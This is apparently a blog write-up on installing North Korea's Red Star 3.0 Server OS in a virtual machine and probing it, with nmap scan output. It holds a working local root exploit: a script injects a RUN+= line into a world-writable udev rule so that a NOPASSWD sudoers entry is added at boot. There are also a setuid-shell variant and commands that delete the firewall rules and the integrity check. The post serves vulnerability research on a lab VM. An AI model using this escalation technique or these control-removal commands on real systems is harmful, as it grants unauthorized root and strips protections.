About North Korea’s Red Star 3.0 Server OS

Red Star OS, North Korea’s official Red Hat/Fedora-based Linux distro, is very easy to install in a VM. Given recent revelations of its many inherent security flaws, it’s an excellent opportunity to install the operating system in a local VM and then pound it for vulnerability assessment. At the very least, this will let you derive a baseline vulnerability footprint irrespective of any firewalls or security protection devices that a real North Korean target may be running.

The Red Star 3.0 Server version can be downloaded from several websites (including archive.org) and via various torrents. Version 3.0 was released in the summer of 2013 but as of 2015, version 2.5 is still widely used by North Korean organizations. The V3.0 distro includes a branded version of the Firefox browser (renamed “Naenara” which translates to “my country”), Wine for running Windows, and uses a KDE desktop which closely resembles Apple’s OS X desktop interface (prior Red Star versions mimicked the Windows XP user interface – Kim Jong Un’s change to a Mac likely prompted the interface change in the official North Korean OS).

Out of the box, network settings are not configured for conventional DNS and likely point to North Korea-controlled name resolution. You’ll have to use IP addresses throughout the system until DNS is configured.

Installation of Red Star 3.0 Server in a VM Player virtual machine

I installed Red Star 3.0 as VM Player virtual machine.  Mount the downloaded ISO image to a virtual CDROM and and choose Red Hat Enterprise 6.0 or Fedora as the VM Player operating system template.  I would suggest leaving any file sharing options turned off for now (you’ll probably want to keep this VM as isolated as possible until we know more about it).

Click through the first screen (click blue button on the right).  You will likely receive a warning dialog box.  I cannot read Korean but I’m assuming the warning is probably informing you that the harddrive will be reformatted.  Either that or you just granted permission for Kim Jong Un to retrieve and use anything inside this OS installation.

If at any point you need help, click the question-mark icon (kidding, everything is in North Korean language).

On this screen, choose the default installation location.  Click on the harddrive icon first to select it and then click the Next button (blue button on the bottom-right).

Fill in the next screen which asks for your name, username, password (twice) and a password reminder phrase.  Click the Next button.

This is the network settings.  Enter a PC name in the top right box.  DHCP is not selected by default so you may want to turn it on using the 2nd option in the top-left-hand dropdown listbox.  Or leave it as is and let it break on purpose if you’re worried about network connectivity through an enemy-controlled operating system.

Select your location from the dropdown box.  I don’t know what the locations are but I’m guessing that South Korea is not in the list.

Set the time and time zone (more on the weird date/time below)

This is the final screen before the installation begins.  Click the blue button on the right and the install starts.

In the screenshot below, Red Star 3.0 OS is installing.  It will take around 10-15 minutes for the installation to complete.

Here comes the bootloader…

Below is the splash screen you’ll see while the OS is booting up.

Press ESC during bootup to watch the logs.

After the installation completes and the OS boots, you will be greeted with the login screen.  Enter the password you created during the installation and click the blue-highlighted button on the right to log into the system.

Getting around Red Star 3.0 Linux (a few interesting tidbits)

Once the login process has completed and the OS has scanned your machine and sent all your personal information to North Korean authorities, you will be presented with the official Red Star desktop interface. Uh, yeah, I was surprised too – the interface is not bad at all.

Clicking the Red Star (how clever) at the top-right of the desktop drops down the menu.

If you get lost, just remember that the button on the left is “Cancel” while the button on the right is the affirmative OK button.

Here is what the file explorer looks like.

And here’s a peek at default permissions on a file.

The web browser is branded Firefox (I have networking disabled at this point).  It launches and attempts to load 10.76.1.11.  WTF!  Yeah, that’s a private internal IP address it’s trying to load right off the bat.  As it turns out, this IP is the proverbial “mothership”.  Researchers have found that tracking, malware reports, crash reports, etc. are all automatically sent to this address private network address.

Interestingly, note the year (104) on the calendar.  According to PC World:

“The operating system uses North Korea’s Juche calendar, which was introduced in 1997. The first recorded day in history is Kim Il-sung’s date of birth on April 15, 1912. 1912 was year 1. This means that 2014 is year 103 in Red Star OS.”

Tweaking Red Star 3.0 – let there be English

The system ships with root disabled by default but given the known vulnerabilities in the system, there are a few ways to get root access.

Once root accsess is obtained, you can run the following as root, reboot, and the system will be in English.  The system will warn you about kernel files changing but you can safely ignore the warning or disable the check using “rm /usr/share/autostart/intcheck_kde.desktop”.

sed -i ‘s/ko_KP/en_US/g’ /etc/sysconfig/i18n
sed -i ‘s/ko_KP/en_US/g’ /usr/share/config/kdeglobals

Then clear iptables with this command and reboot to reset the allowed outgoing ports (Red Star ships with most outgoing ports blocked).

rm /etc/sysconfig/iptables

In case you are curious, below is the contents of passwd.  Note that moste accounts are set to “nologin”.

You can open a terminal shell window through the explorer.  Drill through the menu hierarchy below and double-click the final terminal window icon.

Hacking Red Star 3.0

Getting root on Red Star 3.0

Do a “ls –al” in the /etc/udev/rules.d directory.  Oh my, this *does* look interesting.  A world-writable rules file in /etc/udev/rules.d (Udev is a device manager for Linux)?  Did they really leave an HP LaserJet rule file wide open?  This means you can inject commands into this file to execute them with escalate privileges on system boot.  North Korea made a similar mistake on an earlier version of Red Star.  It’s mind-boggling how idiotic this mistake is but I cannot think of any reason why they’d purposefully allow this vulnerability in the OS.

On my download, su was available but sudo was not.  If you attempt to sudo, you get this:

Of course, sudo would be nice to have so let’s grab it.

Script to enable sudo on Red Star Linux

To enable sudo, create the following script in your home directory and name it enablesudo.sh.  This will modify the unsecured HP rule file (85-hplg10xx.rules) to include “RUN+=” arguments for executing arbitrary commands as root by Udev.  Here’s the entire script:

1 #!/bin/bash -e
2 cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
3 echo ‘RUN+=”/bin/bash /tmp/myroot.sh”‘ > /etc/udev/rules.d/85-hplj10xx.rules
4 cat <<EOF >/tmp/myroot.sh
5 echo -e “ALL\tALL=(ALL)\tNOPASSWD: ALL” >> /etc/sudoers
6 mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
7 EOF
8 chmod +x /tmp/myroot.sh
9 echo “Need to reboot to get sudo”
10 sleep 2
11 reboot

Change permissions to allow the script to execute and run via:

./enablesudo.sh

The script will run and automatically reboot the VM.  After the reboot, you should be able to sudo to get Red Star root access using sudo.

Why this works

Since the 85-hplj10xx.rules file is writeable, you can pretty much inject all sorts of RUN+= stuff in there.  For instance, you can edit the file and insert lines such as these:

RUN+=”/bin/cp /usr/bin/konsole /tmp/myroot.sh”

RUN+=”/bin/chmod 4755 /tmp/myroot.sh”

Then reboot and run /tmp/myroot.sh to get a konsole terminal.

This bears repeating – anything you add with the RUN+= construct will execute with escalated privileges when the system is booted.

Or skip the script altogether

Even easier than the script above, you can simply add a RUN+= line to the bottom of the 85-hplj10xx.rules file that executes a script – and that script will be run with root-level privileges.  Then we can simply add whatever is needed to the script file and reboot the system to run it with escalated privileges.

For instance, the /etc/sudeoers file is readonly by default but by adding a script call to the 85-hplj10xx.rules file, we can escalate our privileges and easily add ALL to sudoers.

First, create a file in the /tmp directory with the single command below.  We put the file in the /tmp directory because the directory is open to all users on the system.  Change the file permissions to allow execute (chmod 4744).  This command will insert the appropriate line into sudoers to allow ALL to sudo to root.

echo –e “ALL\tALL=(ALL)\tNOPASSWD: ALL” >> /etc/sudoers

Next we need to run the script file with root privileges.  Insert the line below at the bottom of the 85-hplg10xx.rules file.  Upon booting, this line will kick off the bash shell and run the shell script above using escalated privileges which are required for the script to insert ALL into the sudoers configuration file.

RUN+=”/bin/bash /tmp/myroot.sh” > /etc/udev/rules.d/85-hplj10xx.rules

Then reboot and do a simple sudo to get root access.

Note that we can sudo even though the passwd file contains /sbin/nologin for the root user (see dump of /etc/passwd in screenshot above).

nmap scans

Below is output from a few nmap scans.  nmap was run directly against the OS/VM (no firewall to bypass or anything like that).

Quick scan – Red Star 3.0 system baseline

As you can see, out of the box, the system is shipped in a locked-down state.  Even installed services (e.g. snort, ssh) must be turned on and firewall rules tweaked before the system will be of much use.

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-12 16:33 CST
Nmap scan report for 192.168.111.134
Host is up (0.00017s latency).
Not shown: 989 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   closed http
135/tcp  closed msrpc
139/tcp  open   netbios-ssn
443/tcp  closed https
445/tcp  open   microsoft-ds
548/tcp  closed afp
631/tcp  closed ipp
5900/tcp closed vnc
MAC Address: 00:0C:29:5A:AC:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.77 seconds

 Comprehensive scan – Red Star 3.0 system baseline

nmap -sS -n -sU -A -v -PE -PP -PS -PA -PU -PY 192.168.111.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-12 22:17 CST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:17
Scanning 192.168.111.134 [1 port]
Completed ARP Ping Scan at 22:17, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:17
Scanning 192.168.111.134 [1000 ports]
Discovered open port 139/tcp on 192.168.111.134
Discovered open port 445/tcp on 192.168.111.134
Completed SYN Stealth Scan at 22:17, 4.70s elapsed (1000 total ports)
Initiating UDP Scan at 22:17
Scanning 192.168.111.134 [1000 ports]
Discovered open port 137/udp on 192.168.111.134
Discovered open port 5353/udp on 192.168.111.134
Completed UDP Scan at 22:17, 3.92s elapsed (1000 total ports)
Initiating Service scan at 22:17
Scanning 995 services on 192.168.111.134
Service scan Timing: About 0.60% done
Service scan Timing: About 2.61% done; ETC: 00:03 (1:42:29 remaining)
Service scan Timing: About 4.62% done; ETC: 23:47 (1:25:16 remaining)
Service scan Timing: About 6.63% done; ETC: 23:40 (1:17:25 remaining)
Service scan Timing: About 8.64% done; ETC: 23:37 (1:12:45 remaining)
Service scan Timing: About 12.16% done; ETC: 23:26 (1:00:12 remaining)
Service scan Timing: About 12.66% done; ETC: 23:34 (1:06:26 remaining)
Service scan Timing: About 16.18% done; ETC: 23:26 (0:57:30 remaining)
Service scan Timing: About 16.68% done; ETC: 23:32 (1:01:51 remaining)
Service scan Timing: About 20.20% done; ETC: 23:26 (0:54:43 remaining)
Service scan Timing: About 26.13% done; ETC: 23:26 (0:50:47 remaining)
Service scan Timing: About 30.65% done; ETC: 23:26 (0:47:17 remaining)
Service scan Timing: About 36.18% done; ETC: 23:26 (0:43:50 remaining)
Service scan Timing: About 42.21% done; ETC: 23:26 (0:39:41 remaining)
Service scan Timing: About 48.24% done; ETC: 23:26 (0:35:32 remaining)
Service scan Timing: About 54.27% done; ETC: 23:26 (0:31:22 remaining)
Service scan Timing: About 60.30% done; ETC: 23:26 (0:27:14 remaining)
Service scan Timing: About 66.33% done; ETC: 23:26 (0:23:06 remaining)
Service scan Timing: About 72.36% done; ETC: 23:26 (0:18:57 remaining)
Service scan Timing: About 78.39% done; ETC: 23:26 (0:14:49 remaining)
Service scan Timing: About 84.42% done; ETC: 23:26 (0:10:41 remaining)
Service scan Timing: About 90.15% done; ETC: 23:26 (0:06:47 remaining)
Service scan Timing: About 96.18% done; ETC: 23:26 (0:02:38 remaining)
Service scan Timing: About 99.10% done; ETC: 23:27 (0:00:38 remaining)
Completed Service scan at 23:26, 4128.55s elapsed (995 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.134
Retrying OS detection (try #2) against 192.168.111.134
Retrying OS detection (try #3) against 192.168.111.134
Retrying OS detection (try #4) against 192.168.111.134
Retrying OS detection (try #5) against 192.168.111.134
NSE: Script scanning 192.168.111.134.
Initiating NSE at 23:26
NSE Timing: About 2.34% done; ETC: 23:49 (0:21:32 remaining)
NSE Timing: About 4.27% done; ETC: 23:50 (0:22:47 remaining)
NSE Timing: About 4.56% done; ETC: 00:00 (0:31:43 remaining)
NSE Timing: About 6.60% done; ETC: 23:57 (0:28:32 remaining)
NSE Timing: About 8.74% done; ETC: 23:55 (0:26:17 remaining)
NSE Timing: About 10.97% done; ETC: 23:54 (0:24:29 remaining)
NSE Timing: About 14.76% done; ETC: 23:51 (0:20:36 remaining)
NSE Timing: About 19.51% done; ETC: 23:50 (0:19:15 remaining)
NSE Timing: About 24.08% done; ETC: 23:50 (0:18:02 remaining)
NSE Timing: About 30.00% done; ETC: 23:50 (0:16:43 remaining)
NSE Timing: About 36.21% done; ETC: 23:50 (0:15:16 remaining)
NSE Timing: About 42.52% done; ETC: 23:50 (0:13:44 remaining)
NSE Timing: About 48.64% done; ETC: 23:50 (0:12:19 remaining)
NSE Timing: About 54.17% done; ETC: 23:51 (0:11:06 remaining)
NSE Timing: About 59.40% done; ETC: 23:50 (0:09:43 remaining)
NSE Timing: About 64.83% done; ETC: 23:51 (0:08:28 remaining)
NSE Timing: About 70.06% done; ETC: 23:50 (0:07:09 remaining)
NSE Timing: About 75.39% done; ETC: 23:51 (0:05:56 remaining)
NSE Timing: About 80.33% done; ETC: 23:50 (0:04:43 remaining)
NSE Timing: About 85.76% done; ETC: 23:51 (0:03:26 remaining)
NSE Timing: About 91.09% done; ETC: 23:50 (0:02:08 remaining)
NSE Timing: About 96.22% done; ETC: 23:51 (0:00:55 remaining)
Completed NSE at 23:51, 1448.83s elapsed
Nmap scan report for 192.168.111.134
Host is up (0.00026s latency).
Not shown: 991 open|filtered ports, 989 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp closed http
135/tcp closed msrpc
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
548/tcp closed afp
631/tcp closed ipp
5900/tcp closed vnc
20/udp closed ftp-data
21/udp closed ftp
80/udp closed http
135/udp closed msrpc
137/udp open netbios-ns Microsoft Windows XP netbios-ssn
139/udp closed netbios-ssn
443/udp closed https
445/udp closed microsoft-ds
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
| Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
| 22/tcp ssh
|_ Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
MAC Address: 00:0C:29:5A:AC:23 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.47%E=4%D=1/12%OT=139%CT=20%CU=20%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54B4B24C%P=x86_64-unknown-linux-gnu)SEQ(SP=D0%GCD=1%ISR=CC%TI=Z%CI=Z%TS
OS:=A)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M
OS:5B4ST11NW0%O6=M5B4ST11)WIN(W1=2D40%W2=2D40%W3=2D40%W4=2D40%W5=2D40%W6=2D
OS:40)ECN(R=Y%DF=Y%T=40%W=2DA0%O=M5B4NNSNW0%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=2D40%S=O%A=S+%F=AS%O=M5B4ST11N
OS:W0%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Uptime guess: 0.064 days (since Mon Jan 12 22:19:26 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: LOCALHOST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: LOCALHOST, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOCALHOST<00> Flags: <unique><active>
| LOCALHOST<03> Flags: <unique><active>
| LOCALHOST<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a-6.rs3.0)
| Computer name: localhost
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: localhost.localdomain
|_ System time: 2015-01-12T23:43:48+09:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn’t support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.111.134

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5601.04 seconds
Raw packets sent: 4108 (157.698KB) | Rcvd: 88 (6.235KB)

nmap comprehensive scan after iptables removed

nmap -sS -n -sU -A -v -PE -PP -PS -PA -PU -PY 192.168.111.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-13 08:19 CST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 08:19
Scanning 192.168.111.134 [1 port]
Completed ARP Ping Scan at 08:19, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:19
Scanning 192.168.111.134 [1000 ports]
Discovered open port 139/tcp on 192.168.111.134
Discovered open port 445/tcp on 192.168.111.134
Completed SYN Stealth Scan at 08:19, 4.93s elapsed (1000 total ports)
Initiating UDP Scan at 08:19
Scanning 192.168.111.134 [1000 ports]
Discovered open port 137/udp on 192.168.111.134
Discovered open port 5353/udp on 192.168.111.134
Completed UDP Scan at 08:19, 4.27s elapsed (1000 total ports)
Initiating Service scan at 08:19
Scanning 994 services on 192.168.111.134
Service scan Timing: About 0.50% done
Service scan Timing: About 2.52% done; ETC: 10:09 (1:46:35 remaining)
Service scan Timing: About 4.53% done; ETC: 09:51 (1:27:10 remaining)
Service scan Timing: About 6.54% done; ETC: 09:44 (1:18:51 remaining)
Service scan Timing: About 8.55% done; ETC: 09:40 (1:13:37 remaining)
Service scan Timing: About 12.07% done; ETC: 09:29 (1:00:49 remaining)
Service scan Timing: About 12.58% done; ETC: 09:36 (1:06:58 remaining)
Service scan Timing: About 16.10% done; ETC: 09:28 (0:57:52 remaining)
Service scan Timing: About 16.60% done; ETC: 09:34 (1:02:13 remaining)
Service scan Timing: About 20.12% done; ETC: 09:28 (0:54:59 remaining)
Service scan Timing: About 24.55% done; ETC: 09:27 (0:51:20 remaining)
Service scan Timing: About 30.58% done; ETC: 09:27 (0:47:15 remaining)
Service scan Timing: About 36.62% done; ETC: 09:27 (0:43:11 remaining)
Service scan Timing: About 42.15% done; ETC: 09:28 (0:39:46 remaining)
Service scan Timing: About 48.19% done; ETC: 09:28 (0:35:36 remaining)
Service scan Timing: About 54.23% done; ETC: 09:28 (0:31:27 remaining)
Service scan Timing: About 60.26% done; ETC: 09:28 (0:27:17 remaining)
Service scan Timing: About 66.30% done; ETC: 09:28 (0:23:08 remaining)
Service scan Timing: About 72.33% done; ETC: 09:28 (0:18:59 remaining)
Service scan Timing: About 78.37% done; ETC: 09:28 (0:14:50 remaining)
Service scan Timing: About 84.41% done; ETC: 09:28 (0:10:42 remaining)
Service scan Timing: About 90.14% done; ETC: 09:28 (0:06:47 remaining)
Service scan Timing: About 96.18% done; ETC: 09:28 (0:02:38 remaining)
Service scan Timing: About 99.09% done; ETC: 09:29 (0:00:38 remaining)
Completed Service scan at 09:28, 4128.60s elapsed (994 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.134
Retrying OS detection (try #2) against 192.168.111.134
Retrying OS detection (try #3) against 192.168.111.134
Retrying OS detection (try #4) against 192.168.111.134
Retrying OS detection (try #5) against 192.168.111.134
NSE: Script scanning 192.168.111.134.
Initiating NSE at 09:28
NSE Timing: About 2.44% done; ETC: 09:50 (0:20:40 remaining)
NSE Timing: About 4.47% done; ETC: 09:52 (0:22:48 remaining)
NSE Timing: About 6.61% done; ETC: 09:54 (0:24:16 remaining)
NSE Timing: About 8.75% done; ETC: 09:57 (0:25:44 remaining)
NSE Timing: About 12.54% done; ETC: 09:52 (0:21:03 remaining)
NSE Timing: About 12.83% done; ETC: 09:56 (0:23:54 remaining)
NSE Timing: About 17.01% done; ETC: 09:52 (0:19:51 remaining)
NSE Timing: About 23.23% done; ETC: 09:52 (0:18:24 remaining)
NSE Timing: About 29.35% done; ETC: 09:52 (0:17:01 remaining)
NSE Timing: About 35.47% done; ETC: 09:53 (0:15:35 remaining)
NSE Timing: About 41.59% done; ETC: 09:53 (0:14:08 remaining)
NSE Timing: About 46.45% done; ETC: 09:52 (0:12:52 remaining)
NSE Timing: About 52.19% done; ETC: 09:53 (0:11:34 remaining)
NSE Timing: About 57.14% done; ETC: 09:53 (0:10:20 remaining)
NSE Timing: About 62.66% done; ETC: 09:53 (0:09:01 remaining)
NSE Timing: About 67.70% done; ETC: 09:53 (0:07:48 remaining)
NSE Timing: About 72.94% done; ETC: 09:53 (0:06:32 remaining)
NSE Timing: About 77.98% done; ETC: 09:53 (0:05:19 remaining)
NSE Timing: About 83.71% done; ETC: 09:53 (0:03:56 remaining)
NSE Timing: About 88.85% done; ETC: 09:52 (0:02:41 remaining)
NSE Timing: About 94.18% done; ETC: 09:52 (0:01:24 remaining)
Completed NSE at 09:53, 1448.53s elapsed
Nmap scan report for 192.168.111.134
Host is up (0.00022s latency).
Not shown: 990 open|filtered ports, 989 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp closed http
135/tcp closed msrpc
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
548/tcp closed afp
631/tcp closed ipp
5900/tcp closed vnc
20/udp closed ftp-data
21/udp closed ftp
22/udp closed ssh
80/udp closed http
135/udp closed msrpc
137/udp open netbios-ns Microsoft Windows XP netbios-ssn
139/udp closed netbios-ssn
443/udp closed https
445/udp closed microsoft-ds
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
| Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
| 22/tcp ssh
|_ Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
MAC Address: 00:0C:29:5A:AC:23 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.47%E=4%D=1/13%OT=139%CT=20%CU=20%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54B53F5E%P=x86_64-unknown-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D2%TI=Z%CI=Z%TS
OS:=A)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M
OS:5B4ST11NW0%O6=M5B4ST11)WIN(W1=2D40%W2=2D40%W3=2D40%W4=2D40%W5=2D40%W6=2D
OS:40)ECN(R=Y%DF=Y%T=40%W=2DA0%O=M5B4NNSNW0%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=2D40%S=O%A=S+%F=AS%O=M5B4ST11N
OS:W0%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Uptime guess: 0.482 days (since Mon Jan 12 22:19:26 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: LOCALHOST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: LOCALHOST, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOCALHOST<00> Flags: <unique><active>
| LOCALHOST<03> Flags: <unique><active>
| LOCALHOST<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a-6.rs3.0)
| Computer name: localhost
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: localhost.localdomain
|_ System time: 2015-01-13T09:32:32+09:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn’t support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.111.134

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5601.67 seconds
Raw packets sent: 4107 (157.670KB) | Rcvd: 89 (6.291KB)

Turn off local firewall on Red Star 3.0

Now that we have root access, we can clear iptables to open up all the outgoing ports.

cd /etc/sysconfig

cp iptables ~/iptables.bak

rm /etc/sysconfig/iptables

 

Additional information

North Korea IP address space